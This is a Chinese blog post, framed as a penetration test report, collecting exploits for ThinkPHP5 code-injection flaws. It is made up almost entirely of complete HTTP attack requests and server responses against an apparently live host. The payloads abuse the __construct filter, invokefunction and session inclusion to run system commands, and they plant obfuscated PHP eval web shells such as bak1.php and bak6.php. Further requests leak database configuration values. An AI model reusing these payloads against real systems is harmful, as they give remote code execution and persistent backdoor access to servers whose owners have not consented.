REC

ThinkPHP5 代码注入漏洞总结 渗透测试报告

易航
易航
1月27日发布 /正在检测是否收录...
0 86 0

tp5_construct_code_exec_2 漏洞

url:http://blog.bri6.cn/index.php?s=captcha

漏洞验证

请求包:

POST /index.php?s=captcha HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Content-type: application/x-www-form-urlencoded
Cache-Control: no-cache
Pragma: no-cache
Host: w1.ltfta5.site
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 60
Connection: close

_method=__construct&method=GET&filter[]=var_dump&get[]=dylan

响应包:

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 02 Mar 2023 05:21:43 GMT
Content-Type: image/png; charset=utf-8
Content-Length: 1876
Connection: close
Set-Cookie: PHPSESSID=v8cee56q175b9p0907sv4lchl4; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache

string(5) "dylan"
string(11) "__construct"
string(3) "GET"
string(8) "var_dump"
string(5) "dylan"
NULL
‰PNG


存在漏洞

payload1

POST /index.php?s=captcha HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Content-type: application/x-www-form-urlencoded
Cache-Control: no-cache
Pragma: no-cache
Host: w1.ltfta5.site
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 125
Connection: close

_method=__construct&method=GET&filter[]=system&get[]=echo+'%3C%3Fphp+%40eval%28%24_POST%5B%22kkk%22%5D%29%3B%3F%3E'+>bak1.php

payload2

POST /index.php?s=captcha HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Content-type: application/x-www-form-urlencoded
Cache-Control: no-cache
Pragma: no-cache
Host: w1.ltfta5.site
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 125
Connection: close

_method=__construct&method=GET&filter[]=system&get[]=echo+"%3C%3Fphp+%40eval%28%24_POST%5B%27kkk%27%5D%29%3B%3F%3E"+>bak1.php

payload3

POST /index.php?s=captcha HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Content-type: application/x-www-form-urlencoded
Cache-Control: no-cache
Pragma: no-cache
Host: w1.ltfta5.site
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 142
Connection: close

     _method=__construct&method=GET&filter[]=assert&get[]=file_put_contents('bak1.php',base64_decode('PD9waHAgQGV2YWwoJF9QT1NUWydra2snXSk7Pz4%3D'))

写入成功

tp5_index_construct_rce 漏洞

url:http://blog.bri6.cn/index.php?s=index/index/index

漏洞验证

请求包:

POST /index.php?s=index/index/index HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Content-type: application/x-www-form-urlencoded
Cache-Control: no-cache
Pragma: no-cache
Host: w1.ltfta5.site
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 52
Connection: close

s=xskfC&_method=__construct&method&filter[]=var_dump

响应包:

HTTP/1.1 500 Internal Server Error
Server: nginx
Date: Thu, 02 Mar 2023 05:41:02 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
Set-Cookie: PHPSESSID=08bvf36sj6d6n1n8d0jrvqp184; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 282

string(5) "xskfC"
string(11) "__construct"
string(0) ""
string(8) "var_dump"
string(5) "xskfC"
string(11) "__construct"
string(0) ""
string(8) "var_dump"
string(5) "xskfC"
string(11) "__construct"
string(0) ""
string(8) "var_dump"
链接无效!请联系客服获取有效链接!

漏洞存在

payload

POST /index.php?s=index/index/index HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Content-type: application/x-www-form-urlencoded
Cache-Control: no-cache
Pragma: no-cache
Host: w1.ltfta5.site
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 186
Connection: close

s=file_put_contents('bak5.php',base64_decode('PD9waHAgJGE9In4rZCgpIl4iIXsre30iO0AkYj1iYXNlNjRfZGVjb2RlKCR7JGF9WyJhIl0pO2V2YWwoIiIuJGIpOz8%2B'))&_method=__construct&method&filter[]=assert

写入成功

tp5_session_include 漏洞

url:http://blog.bri6.cn/index.php/index

漏洞验证

请求数据包:

POST /index.php/index HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Cookie: PHPSESSID=uzozteeqzqb0lxop0bi3awl9g
Content-type: application/x-www-form-urlencoded
Cache-Control: no-cache
Pragma: no-cache
Host: w1.ltfta5.site
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 113
Connection: close

_method=__construct&method=GET&filter[]=think\__include_file&get[]=/tmp/sess_uzozteeqzqb0lxop0bi3awl9g&server[]=1

响应结果:

think|a:5:{s:4:"test";s:0:"";s:11:"__construct";s:0:"";s:18:"think\Session::set";s:0:"";s:3:"get";s:0:"";i:1;s:0:"";}

payload

POST /index.php?s=captcha HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Cookie: PHPSESSID=q1ces7rkvhr3gg7t9daaxkh9w
Content-type: application/x-www-form-urlencoded
Cache-Control: no-cache
Pragma: no-cache
Host: w1.ltfta5.site
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Content-Length: 260
Connection: close

_method=__construct&filter[]=think\Session::set&method=get&get[]=<?php+$a='file_put_contents';$b='base64_decode';$a($b('YmFrLnBocA=='),$b('PD9waHAgQGV2YWwoJF9QT1NUWydra2snXSk7Pz4='));?>&server[]=1

写入成功

tp5_invoke_func_code_exec_1 漏洞

url:http://blog.bri6.cn/index.php?s=index/think\app/invokefunction&function=phpinfo&vars[0]=-1

漏洞验证

请求包:

GET /index.php?s=index/think\app/invokefunction&function=phpinfo&vars[0]=-1 HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Cache-Control: no-cache
Pragma: no-cache
Host: w1.ltfta5.site
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close

响应包:

phpinfo页面

漏洞存在

payload

GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=bak6.php&vars[1][]=%3C%3Fphp+%24a%3D%22%7E%2Bd%28%29%22%5E%22%21%7B%2B%7B%7D%22%3B%40%24b%3Dbase64_decode%28%24%7B%24a%7D%5B%22a%22%5D%29%3Beval%28%22%22.%24b%29%3B%3F%3E HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Cache-Control: no-cache
Pragma: no-cache
Host: w1.ltfta5.site
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close

tp5_dbinfo_leak 漏洞(数据库信息泄露)

url:http://blog.bri6.cn/index.php?s=index/think\config/get&name=database.hostname

漏洞验证

请求包:

GET /?s=index/think\config/get&name=database.hostname HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Cache-Control: no-cache
Pragma: no-cache
Host: w1.ltfta5.site
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close

响应包:

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 02 Mar 2023 05:51:35 GMT
Content-Type: text/html; charset=utf-8
Connection: close
Vary: Accept-Encoding
Content-Length: 9

localhost

漏洞存在

payload1

GET /?s=index/think\config/get&name=database.hostname HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Cache-Control: no-cache
Pragma: no-cache
Host: w1.ltfta5.site
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close

payload2

GET /?s=index/think\config/get&name=database.hostport HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Cache-Control: no-cache
Pragma: no-cache
Host: w1.ltfta5.site
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close

payload3

GET /?s=index/think\config/get&name=database.hostport HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Cache-Control: no-cache
Pragma: no-cache
Host: w1.ltfta5.site
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close

payload4

GET /?s=index/think\config/get&name=database.database HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Cache-Control: no-cache
Pragma: no-cache
Host: w1.ltfta5.site
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close

payload5

GET /?s=index/think\config/get&name=database.username HTTP/1.1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/77.0.3865.90 Safari/537.36
Cache-Control: no-cache
Pragma: no-cache
Host: w1.ltfta5.site
Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2
Connection: close
© 版权声明
文章版权归作者所有,未经允许请勿转载。
本站用户发帖仅代表本站用户个人观点,并不代表本站赞同其观点和对其真实性负责。
转载本网站任何内容,请按照转载方式正确书写本站原文地址。
THE END
技术教程# PHP# ThinkPHP
喜欢就支持一下吧
点赞 0 分享 赞赏
本站资源大多存储在云盘,如发现链接失效,请及时与站长联系,我们会第一时间更新。
版权属于:易航
本文链接:https://blog.bri6.cn/archives/383.html
作品采用署名-非商业性使用-相同方式共享 4.0 国际 (CC BY-NC-SA 4.0)》许可协议授权
相关推荐
小皮面板 phpstudy 后门漏洞
小皮面板 phpstudy 后门漏洞
小皮面板 phpstudy 后门漏洞
1天前 9
2025 年揭穿 PHP 的真相:10 个深入人心的错误 “神话”
2025 年揭穿 PHP 的真相:10 个深入人心的错误 “神话”
2025 年揭穿 PHP 的真相:10 个深入人心的错误 “神话”
2天前 17
轻松掌握 PHP 8 新特性:15 个实用示例助你快速上手
轻松掌握 PHP 8 新特性:15 个实用示例助你快速上手
轻松掌握 PHP 8 新特性:15 个实用示例助你快速上手
6天前 21
PHP 8.X 深入探讨 PHP 性能改进特性
PHP 8.X 深入探讨 PHP 性能改进特性
PHP 8.X 深入探讨 PHP 性能改进特性
1月28日 12
提升 PHP 编码效率的 10 个实用函数
提升 PHP 编码效率的 10 个实用函数
提升 PHP 编码效率的 10 个实用函数
1月26日 216
PHP 中不可不知的语法糖,你都用了哪些?
PHP 中不可不知的语法糖,你都用了哪些?
PHP 中不可不知的语法糖,你都用了哪些?
1月16日 55
评论 抢沙发
取消 登录评论